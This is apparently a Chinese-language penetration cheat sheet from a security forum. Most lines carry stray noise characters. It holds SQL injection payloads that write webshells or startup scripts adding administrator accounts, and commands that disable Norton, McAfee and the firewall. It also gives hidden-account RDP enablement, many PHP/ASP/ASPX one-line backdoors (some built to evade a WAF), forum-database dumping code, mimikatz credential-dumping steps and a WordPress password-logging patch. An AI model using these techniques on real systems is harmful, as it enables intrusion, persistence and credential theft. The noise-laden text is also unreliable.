SELECT password_hash FROM sys.sql_logins where name='sa'# q$ ~) K) q0 k# B
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
- y; @: w* X0 {+ S( F2 e) ^, iaccess中导出shell9 D) I! a2 t. g4 K

/ O4 o* J0 w% E' F* O. s1 t中文版本操作系统中针对mysql添加用户完整代码:9 V  \* z5 q) p4 ~4 u& U
! M9 ^% N* N6 m1 g" Z) e7 Z5 I
use test;
5 D9 g9 H; h2 S. t7 `( l; Xcreate table a (cmd text);
. \+ D# L8 V8 h9 p4 ^insert into a values ("set wshshell=createobject (""wscript.shell"") " );
3 J: x' n. P& L: s; n4 {9 h% Ainsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
6 ?# e- N4 w0 z/ b3 n# Sinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
4 a  {, _6 M) u* Fselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
% [( m8 _, I' x% Ndrop table a;3 D+ G$ S1 O! G# m' k
3 }, [9 a7 z  ]3 V7 g5 b
英文版本:
9 g& d$ a; e/ a* O' g3 j8 P
- I& Q- r+ v' A. }7 y; luse test;
& ^( A: \! b; acreate table a (cmd text);, t( @/ L2 U" `) ?5 Q3 t
insert into a values ("set wshshell=createobject (""wscript.shell"") " );( e5 F( R5 c) ?6 h
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
- u+ A8 o7 v# R2 `insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
( k* h2 ^, o1 }# h) iselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";# o/ X- `! j3 J( V: i' s& E
drop table a;. U  M; Q% U# z( z- a

4 R9 ^+ ?# c5 a" k  q3 Ucreate table a (cmd BLOB);' C0 B' _+ y6 g2 V
insert into a values (CONVERT(木马的16进制代码,CHAR));2 g; k: Y( S2 y; {5 o; q5 X8 p, W
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
* |; {3 T: t; e6 Q6 ~5 K( ?drop table a;" ^" W% Z6 k6 u' X5 V& N( q

2 Y0 B+ ~: u! r( B9 }; f记录一下怎么处理变态诺顿( y% k6 }3 A( J, r1 V
查看诺顿服务的路径' g3 M: Q$ F7 O" a, u1 F$ j6 x5 }# ~
sc qc ccSetMgr: p% Y& c- Z5 g7 n' X
然后设置权限拒绝访问。做绝一点。。- T5 ~' ^& P# S, [# {
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
5 m: w0 L2 W7 d+ r! acacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
- I; @- [4 P/ x" R. j6 ]3 tcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
! s* L. q4 j/ I  Kcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone# j) `! C  ^0 ]6 N" ]

8 b: T; Y! {/ u) z然后再重启服务器
4 h/ h( `* v% j8 M  Niisreset /reboot
8 @) m1 P( p. Z这样就搞定了。。不过完事后。记得恢复权限。。。。
8 O# K7 Y# V# W5 `. q8 B- Icacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
: a3 K/ b( I) G% C+ Q2 B5 U2 P9 ]cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
" W' q9 M3 Y0 u" Ncacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F4 x9 q6 B( P. E
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F% H& j2 r' M7 w) d% l  F! ^: W+ \" o
SELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
, l- _2 n$ B9 ]* b; i* U9 K$ U8 \1 }: C! J5 y: f6 x* v' F: C' ]
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
, U# m1 I1 ?( \  c' }3 A; Y% F5 G1 Y2 x; j1 Q
postgresql注射的一些东西
, F! i4 {+ A# V7 |; Y4 A如何获得webshell% t9 P9 w  E& x" n+ V) s+ M: |' G
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); 1 y6 b9 p2 D) L( Z: {
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$); & @" F. |1 a% \+ k2 C
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;, P( g+ {, j0 J' R2 }0 X# }
如何读文件
" }. B4 ?3 X' A# k# @0 L" Ohttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
& `- Q$ k# `& G) m: k( B9 }http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;) o% v# I0 ^5 ?0 h
http://127.0.0.1/postgresql.php?id=1;select * from myfile;( n! G) e+ l% l* z* [: i

$ H% h- y9 Y" tz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
0 g* H( {- D: _2 B1 Q" M9 u当然,这些的postgresql的数据库版本必须大于8.X) [- M! b: n3 t5 J/ _
创建一个system的函数:
/ }3 S* i' I/ `4 iCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT6 F/ r% p$ Z+ C) D% X; G2 ~2 u

9 t. q4 S+ \5 }3 _# M/ {+ y$ N% E创建一个输出表:- q; D& D, z+ ]# |, M
CREATE TABLE stdout(id serial, system_out text)
" T( x9 d* a9 U7 \2 C, V- [" |8 l
% C$ v  B5 o1 Q4 i9 `% U执行shell,输出到输出表内:
  K$ J: S, y; i( ySELECT system('uname -a > /tmp/test')
* V' F3 M4 s! S! t9 z! j; b: b* z- W2 i; u
copy 输出的内容到表里面;; h, I# n8 y! B$ [- `# n1 k2 d4 e
COPY stdout(system_out) FROM '/tmp/test'
* y# T+ d9 G8 h& e4 l6 `' O5 K/ z% A* H: L
从输出表内读取执行后的回显,判断是否执行成功
% P. F- e: X- R: ?% U# ]5 w( ~0 H7 e
SELECT system_out FROM stdout& ~- b/ }. r1 ?' E; f4 _  j: [
下面是测试例子
5 ~9 X& p  N7 r. Q, ^1 y6 T$ U% n* H/ |
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- 2 U8 F7 ~) l- ~7 E
2 p# i8 f4 R0 Q2 Y- j7 m
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
! S1 b* b# a( S( m* lSTRICT --- \6 A3 C$ p& C4 A
% {/ B5 N' ~  E3 d6 @7 _. e" x
/store.php?id=1; SELECT system('uname -a > /tmp/test') --
- g& @9 s+ p: R3 n% s
+ S$ k# y6 v: e/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --
0 z) e( N; U; Y+ D% x1 t9 J# W
' F8 l1 u  @: N$ F# z3 I; Q' w/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
5 d" o0 [) B0 M4 Q9 K2 gnet stop sharedaccess    stop the default firewall$ x* `4 w4 k6 g& N9 P# T& a
netsh firewall show      show/config default firewall- w. R+ I. }/ n6 m1 o5 C9 I' w
netsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall/ o" Z& v2 B0 x7 L7 C" d
netsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall6 Q1 Z* W4 d4 ~3 V& k
修改3389端口方法(修改后不易被扫出)5 j1 `  ]! h; }3 R: ~
修改服务器端的端口设置,注册表有2个地方需要修改$ [4 M6 x3 [: y" r

; t& E6 _* b$ e/ f, ]$ M4 a( ?[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
1 P8 C1 G4 A! T6 |PortNumber值,默认是3389,修改成所希望的端口,比如6000
' k: c9 `& v' X. K3 i8 S( T! [  L( _
. J9 Y3 C5 g0 A* N; P( ^# d第二个地方:, a% L, Y0 G% z
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 
; c0 ^0 r7 e1 a4 Z/ E$ @5 W* sPortNumber值,默认是3389,修改成所希望的端口,比如6000
9 \1 l- ~( w: @5 M; C" V
  H# O+ u( ?2 |+ v8 i现在这样就可以了。重启系统就可以了' b/ O% ~' ~- e$ G
, w) ^% w& j4 J. S! R
查看3389远程登录的脚本
0 o5 ?5 y% R3 h! t6 M+ b$ Y* l保存为一个bat文件
+ M! d- B3 b5 j- U1 t4 t! Q9 _date /t >>D:\sec\TSlog\ts.log0 k: {) K& Y/ w! H( q! s0 Z$ \
time /t >>D:\sec\TSlog\ts.log2 z6 ^9 `$ e9 M+ _: i5 c! q2 t& f
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log, s, s0 i# e' J5 l' L+ ]
start Explorer
5 w* `' ?8 F4 K
% y9 z$ R) @( X0 {: c1 wmstsc的参数:
6 b* O" \' m; g4 E; W  Z; D2 z2 I1 ^+ v
远程桌面连接8 @2 S( j4 M1 p9 i& @

* J& j6 D/ B& h2 CMSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
4 l+ ?" m7 Z. |, A/ \$ k  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?' w) L6 I" z0 d7 z+ G! a, E* m
& w4 u! I7 i4 G( d" u1 E
<Connection File> -- 指定连接的 .rdp 文件的名称。
, F9 i5 j2 ]1 {3 f; b' ^
+ B6 c9 \7 ]  z. r/ {0 |7 X/v:<server[:port]> -- 指定要连接到的终端服务器。2 G! D5 A! j- z! A: m; N

! X5 l0 x7 G( K# A! {$ ]. I/console -- 连接到服务器的控制台会话。
- Z! z' p9 p0 v1 }( E
0 `8 u- N& f7 V. \5 n( S; v/f -- 以全屏模式启动客户端。
, w7 Y! l1 w6 T8 N7 W* U. [& v
2 x4 F/ v4 D# P  n; O: q/w:<width> --  指定远程桌面屏幕的宽度。  D2 T, r3 X& \% Y9 `3 j
- U& x1 a+ @* T
/h:<height> -- 指定远程桌面屏幕的高度。$ v# z9 n  k/ {! @% @  `: {
" p, m5 }4 j$ R
/edit -- 打开指定的 .rdp 文件来编辑。
% u* \( _9 b( }, C! y9 L+ a& d' b: C
/migrate -- 将客户端连接管理器创建的旧版
; J1 h3 R7 w: x4 ?1 ~2 E  ?7 w( b! j. Q连接文件迁移到新的 .rdp 连接文件。
$ U3 h1 p* {6 `8 l/ s" `# N6 v4 F$ y1 M( l

/ [5 b- a8 c6 @其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就: h/ }6 N3 Z! Q! h$ o3 I8 S
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量0 Y9 r0 g9 b" _  c( h' f
, ^. w9 m  k3 y7 F; W* r3 e
命令行下开启3389
% k5 T0 t! B; snet user asp.net aspnet /add
- r' Q, H0 Z3 N3 u' Znet localgroup Administrators asp.net /add5 ^7 U8 F2 [0 Q- J6 O- A' G- l
net localgroup "Remote Desktop Users" asp.net /add
) D$ C/ W% U" `5 f4 Pattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
+ ~2 M$ |# T) @7 h4 }/ iecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
% i. U$ [$ X) t' |+ secho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 15 F: ~+ u9 v3 T" X$ u+ \) o. P1 a* U
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
$ o  k5 c! u4 Q" Gsc config rasman start= auto
- I  U% k! a+ F7 e  h  }. M% Q' }sc config remoteaccess start= auto: F7 @9 ]8 r8 I4 O- A
net start rasman) V) V4 `1 G: u2 Z. }2 I
net start remoteaccess; G- F& o8 I) H. z$ _# K- w
Media
' f' C/ b! J) D% M$ d5 g2 s<form id="frmUpload" enctype="multipart/form-data"; Y% a* _; r* e% s1 A9 g
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>0 O) ?  k7 {/ H! h
<input type="file" name="NewFile" size="50"><br>% p$ x& {( N. A
<input id="btnUpload" type="submit" value="Upload">7 S$ z0 l: J, k" H7 _/ t2 U
</form>
( ?" Q/ S* G: D) u5 b
' ?1 |0 V6 U# ]1 Z8 y9 \control userpasswords2 查看用户的密码" e( k! A: k# _" Z  k- X
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
% ?( ?) z1 }7 t# e: JSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a3 _1 M! u2 Q/ D: A. ^
- M: {+ b) Z4 ~7 G  n2 d
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
& O' }1 @8 j8 t  i3 f# \测试1:; A9 p1 ~) q  _2 `( u2 \2 ^" ^
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1& B1 a8 I, K% o1 j6 J" @. S5 ]. m

" I" _# m' [; w1 h. s测试2:" R2 i. l. j- p: T. Z- h
, A# q- `* I3 D# Q3 i, d/ r3 [
create table dirs(paths varchar(100),paths1 varchar(100), id int)
" F8 V* P8 i* Y+ u7 s' @  }. Q
2 d, G7 a: Z+ f1 e, k$ |delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
1 S* l+ y. E! v4 T4 l. p( e) s' m% h/ c5 f; X0 ~( v, s
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t15 _  q9 F# s& R+ m5 O! {# }/ `7 ?2 m
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令  b( Z0 A( K+ f$ j2 h+ @, R
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
! t  E! C$ T( ?, K, Ynet stop mcafeeframework
" ^$ h8 `& t- L0 B. lnet stop mcshield4 }# W" o2 K* {2 [5 [
net stop mcafeeengineservice
+ m$ k6 ^1 W" Hnet stop mctaskmanager
* B  T9 S0 T( M9 t/ u* |5 L3 E1 x0 `http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D& d0 M& B3 @) H" O' M
/ l/ G$ i% f! h. G7 X' x
  VNCDump.zip (4.76 KB, 下载次数: 1)   f* I( p; Q9 b8 u
密码在线破解http://tools88.com/safe/vnc.php
4 W/ a3 c0 c1 l0 pVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取8 A# o" T& ~# Z5 |8 t) D

; E1 \- {4 u  T% _1 z; E% @5 ^exec master..xp_cmdshell 'net user'
' ?, k1 B) B% M; Imssql执行命令。
  K2 W3 |0 o2 t0 C获取mssql的密码hash查询
' T, ^0 \# a- }: \select name,password from master.dbo.sysxlogins
/ P, B# o+ X8 F, v! \# d+ r5 a, K2 t* D% v
backup log dbName with NO_LOG;9 {# B7 b) E( _. C8 i# [3 f8 i
backup log dbName with TRUNCATE_ONLY;) [  [1 r' `) y5 @
DBCC SHRINKDATABASE(dbName);7 M1 I" A+ w- W5 z/ @" P7 H% K" b
mssql数据库压缩
  L  N8 E8 g# Z6 A  S" L
. Z$ w! I' t; T! Q! D; A& bRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
. y1 B; p" D5 |# k; Q3 O' e# J将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
3 S) U1 H/ z0 ~9 @' f9 \5 X$ S, r4 o$ }* C
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'2 {, y& {. Z& C$ Z* v/ t  Q
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
5 `0 ]0 m& N$ A. E
9 h) P+ l  R: f" u. fDiscuz!nt35渗透要点:  i& a$ q2 @# J  j( I. p& M
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default
2 D) q( L: c, n" a( ?(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%># ^( F+ T7 u6 p% n7 e
(3)保存。4 \$ x* Q/ {" g: v$ o% G
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
% U* `$ ]/ @8 d; V: ^. f3 H5 dd:\rar.exe a -r d:\1.rar d:\website\, g! Q( R! `% M) y3 c) N
递归压缩website
7 K8 _# t  J; g/ n注意rar.exe的路径2 o# E7 E4 {) {

  @' b% g5 b& S- u2 w/ R( N<?php
: b+ I  N+ a2 F) c+ E  ^' x' W
5 t! X6 j) A/ x- s$telok   = "0${@eval($_POST[xxoo])}";
6 H  e7 C" G, x  g: C
7 F0 q, E$ b0 Y, m3 k$username   = "123456";
* M( Q- @2 J3 O" g5 e9 D! T8 ?) b' o( G! q- F
$userpwd   = "123456";
4 B0 g, D$ c9 I+ J7 X# O) o( T  R/ a& M) I
$telhao   = "123456";
2 J! g0 G9 y; _; S0 J
  @  q8 {( z- n" i$telinfo   = "123456";
& F0 Q- ?0 v3 c  c5 c" I7 {6 ^9 o9 T, D- S; _& X9 L5 Q
?>
6 [, h; x# u. ]0 u/ i, {: Lphp一句话未过滤插入一句话木马
/ Z! f: X% q9 v; G9 V) c) e# G& n- A* @* S
站库分离脱裤技巧
* O% ~( D+ ]3 ]exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
3 @0 I7 E  O5 C4 Wexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'7 b1 }: m  F7 T, h- f5 h, I
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。# p- e. Y: R1 {) h! H
这儿利用的是马儿的专家模式(自己写代码)。! ~5 ~' b2 M- F+ b
ini_set('display_errors', 1);
8 I$ B2 d4 k8 qset_time_limit(0);
- c* i" Q0 M! i. b2 a% D! `# Aerror_reporting(E_ALL);
( L/ ^7 v9 a# F- L$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());, z2 o! s+ u& |; M" F7 n( e* b; B
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
2 p2 c6 R& x7 n- _7 l$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
; ]+ Q' Y( b8 w4 c, {$i = 0;
. N- D  e6 Y  U( l: n+ y2 q6 {. Y$tmp = '';& C& U# Q' |6 [, x, t# n
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {( v; b/ T3 m1 d7 G
    $i = $i+1;
. E* k4 {  N: o3 L% A8 N    $tmp .=  implode("::", $row)."\n";' J  G; }, P4 \
    if(!($i%500)){//500条写入一个文件% Y: R0 }$ e) x% Q/ f
        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';6 t5 l: n5 v* ~; `: m' s. r
        file_put_contents($filename,$tmp);& ~" _" C9 G0 _
        $tmp = '';! N9 ^8 g* l  Z5 ?
    }9 L0 ?4 q) [2 d6 {4 B
}
! Q! o' A( K4 c' {. K/ Amysql_free_result($result);2 D! w1 m% t9 D6 ?/ W/ ]
* f( F: d' x1 o7 m
7 P6 D+ p3 @5 k
9 i$ J( M+ l1 M
//down完后delete: a3 u! ^) S/ t0 @" l1 q
& t4 J! o! v1 C
( u9 ?" n: @% r: L
ini_set('display_errors', 1);
% `( o; p, {* |5 {" `error_reporting(E_ALL);8 T9 f) j6 W1 q
$i = 0;
* O, o6 A8 U3 r5 E- v$ qwhile($i<32) {) C% I0 t8 ?! b# B& [+ Q& E2 Q
    $i = $i+1;
% Q) g+ K1 H9 |! l4 E) f0 E3 C3 ^        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';! M- f; O/ _8 T6 f# E
        unlink($filename);# ~$ x! v, h: F+ v- f* s) F
} , B$ t$ ?( w. L4 W+ y
httprint 收集操作系统指纹( [& `4 H5 F9 q
扫描192.168.1.100的所有端口
) `- E' P2 E- z) `9 B1 l4 }2 L, J& p3 ynmap –PN –sT –sV –p0-65535 192.168.1.100
: [' w) l9 M  u$ @  Ehost -t ns www.owasp.org 识别的名称服务器,获取dns信息8 o+ d  E, b/ }/ t
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
; U1 B. k9 C! [Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
& C; r1 D9 [- r- S6 m) o( z
! Z( m, D; I2 ^7 gDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
, v( X1 E4 x! N! U; U1 P( l; f. k9 u$ l( P6 ?! n
  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)) D" I9 k- S# _7 C3 }/ C( M

! p+ c- ^, y# J+ o: e, \  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x; d/ v" S3 n# U+ J0 h

6 f7 ~; n; X5 p1 I0 ]  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)4 G' l5 V# T3 V9 g' G$ r
8 H6 [+ \3 x6 g4 B6 j) k! \9 F
  http://net-square.com/msnpawn/index.shtml (要求安装)
6 @* a! V$ b# v* o5 R0 p. S4 t6 ]: S+ t: }6 J
  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
& V" w9 Y0 Y# R& L$ [9 ?7 ~8 f7 z, d& T" U3 i
  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)' |, }- d/ P. A
set names gb2312/ u$ @# Q! ?9 g  X5 B) `: P/ k; f' M& }9 i
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
5 m% A/ ~6 e$ Y
/ _) r, a; l2 [% P' O& i6 M9 x# _mysql 密码修改$ Q# s' c( q* W; Y
UPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ”
& m  ?+ e7 f  x( Y2 n2 n: ^/ h( [- w! Vupdate user set password=PASSWORD('antian365.com') where user='root';2 W% `) x4 x- x4 D' z7 O
flush privileges;
* Y/ F6 U( Z3 R$ V高级的PHP一句话木马后门$ b  ?# L6 C2 w8 r+ b, Y
- T9 Y0 B$ K$ ~) H+ P) P; l% Q
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
  c! ~: c# [& x6 g" ^& f7 S4 n: Q4 i; f) Y' K. r2 u" [
1、' S" S3 E/ l- v
5 O# t; B, C  z- ?7 f8 }9 F
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";' A- x( f+ j# U3 t! Y$ f

2 L; ]& x# K+ p- @5 N  i" x" U# k$hh("/[discuz]/e",$_POST['h'],"Access");/ U9 H6 K9 p0 u) W, P0 r" z) T
% z" M* \9 }, _4 U
//菜刀一句话+ m2 z7 Y* q) L; ]+ R
3 [) \# v3 o5 Q! t* A- j
2、; `) u" Z/ d! G" l

( |# Y! H0 N2 S$filename=$_GET['xbid'];
/ |8 l4 T- j9 H* J) _& _& F/ O6 h
$ J6 [0 N. B0 m% O( y+ A/ pinclude ($filename);. H0 e, i( k' U
/ @7 ^5 m& M' m& s) Y2 f
//危险的include函数,直接编译任何文件为php格式运行/ j) s7 J) g8 g% ?; N7 C  w
8 a1 r3 k' t5 k; v* ]! {* ]! Y
3、
1 ^. v6 a9 ]. i2 ]0 \3 {: S8 |7 i+ K" J( N4 m
$reg="c"."o"."p"."y";
0 h/ T) G* x% X2 k) a' ^( @; v5 j/ a& G/ ?& x4 c
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
6 O3 Q8 E$ H9 [/ ]* m, k
  @& J! S, N- o6 E9 y- }//重命名任何文件
7 i3 h% Q3 r% r7 w
. a+ l8 O0 J2 A( [4、
4 j7 H/ C& Y' y! n, k: @& i
% l9 W, ~/ u1 {* S/ L- }: s$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";3 W4 m. x/ J; v2 q
: D7 d$ s6 |) U% h7 u6 U4 D7 a2 q
$gzid("/[discuz]/e",$_POST['h'],"Access");
+ \; o! z" {0 y0 a) V$ p- i5 M" j6 r. l3 W' }- L4 {
//菜刀一句话2 C- m. k" d5 Q; S) ^; j
; x% t5 x1 b( B- D8 O4 Z
5、include ($uid);
& M& v, K1 @$ Y8 [4 N2 g' [% H. |- W2 ~) L
//危险的include函数,直接编译任何文件为php格式运行,POST
! ]! \/ _& T! i( x8 |( v- p* o/ r/ n. C4 f, |

' J3 ~! b0 O, X/ Z/ x' S& Z//gif插一句话9 }* _# H) f' a  I. ^7 \3 \

/ H! r1 e% i# l  U$ S4 p6、典型一句话( b+ E8 X! d9 I! C# J

$ j# a+ j- H& x1 V  v$ J8 F程序后门代码
2 J: N3 `  ?0 p% @+ Q<?php eval_r($_POST[sb])?>
" ~+ U1 k; K5 g. I4 O程序代码# J, q6 H6 [3 H
<?php @eval_r($_POST[sb])?>/ ~8 N1 |3 R4 e# `
//容错代码
+ }! z' P3 U' J- [. P) Y$ y程序代码
, Q: r% h+ e- x- o- t6 J<?php assert($_POST[sb]);?>
0 `- f. c. X. D5 _/ ~; A* L//使用lanker一句话客户端的专家模式执行相关的php语句
3 O+ {! q; x& }+ r$ C程序代码8 J' k5 |& k# Y7 w: o
<?$_POST['sa']($_POST['sb']);?>  W5 l; F5 q  _. Z
程序代码
, F  U' N  N, m4 Q- d! u% }2 l<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>7 K2 A6 @- i' M# @3 O
程序代码
: G  r% H5 B8 [3 X" X- `<?php' {8 d0 |& Q" F8 a! t/ V" p9 b
@preg_replace("/[email]/e",$_POST['h'],"error");: _' v% s6 ]4 I9 P$ M) W3 n
?>
% z! n1 p. i1 f: a& V% T  ~//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
9 M' X( \1 h& G/ }/ W6 r, Q程序代码
" I2 [. a. @4 ?% r4 o<O>h=@eval_r($_POST[c]);</O>
& b+ x" B" C. m8 z+ H) _程序代码% p4 g- v8 s. [" v1 z0 d+ X
<script language="php">@eval_r($_POST[sb])</script>
6 I& s% l3 e- N% ?$ [" _//绕过<?限制的一句话
( S0 L. e! D* d  D
+ i3 z2 d9 i5 |http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip, c0 w( ~" o' K" ~0 y% C  s
详细用法:  P8 h9 M- P& m# X
1、到tools目录。psexec \\127.0.0.1 cmd9 ^/ P7 j1 E6 S1 I0 H4 F3 I0 E
2、执行mimikatz1 ]. R) Q) W4 ~4 C5 {1 S1 C% F; S3 D
3、执行 privilege::debug* g3 d; ^7 N5 K, O9 i% k
4、执行 inject::process lsass.exe sekurlsa.dll
) a% q1 h2 ]; q5、执行@getLogonPasswords
5 A; n$ Y7 F- m! x# B$ Z6、widget就是密码
, I5 w0 Z& J% ^: j% F/ g7、exit退出,不要直接关闭否则系统会崩溃。
/ K5 o3 R" Y: v3 j; u' Y7 r) l# m- J, w* p
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
- [" E, f2 ^: ^
( q( g- M( j7 Z/ F* [自动查找系统高危补丁8 e9 ]( i; m+ l0 Z9 v
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt/ ^$ G- w  X! J' h3 B9 G

3 M/ Y9 X1 I- q- D突破安全狗的一句话aspx后门
7 R- Q4 L1 _# |<%@ Page Language="C#" ValidateRequest="false" %>& d5 U/ |" X( d
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
1 l) D9 [1 c% h% R9 c# l, w. Q; \webshell下记录WordPress登陆密码
, [' ]) N" _# B7 }2 {% `% k( C; m1 w5 l3 cwebshell下记录Wordpress登陆密码方便进一步社工5 ~. W0 X0 s0 C
在文件wp-login.php中539行处添加:0 U: D( r1 [" E) ]5 @0 [' a
// log password, [( a% A- s0 W  R* E
$log_user=$_POST['log'];* P2 c' ^* \% {% e+ Q( j" N
$log_pwd=$_POST['pwd'];
6 |$ Q. s* ^3 s4 }# P$log_ip=$_SERVER["REMOTE_ADDR"];: x/ [* M* t6 E1 m5 q& V. \
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;( R+ z! g" y$ T3 ]1 K
$txt=$txt.”\r\n”;- q. q+ H! h  c8 A0 z" n7 `
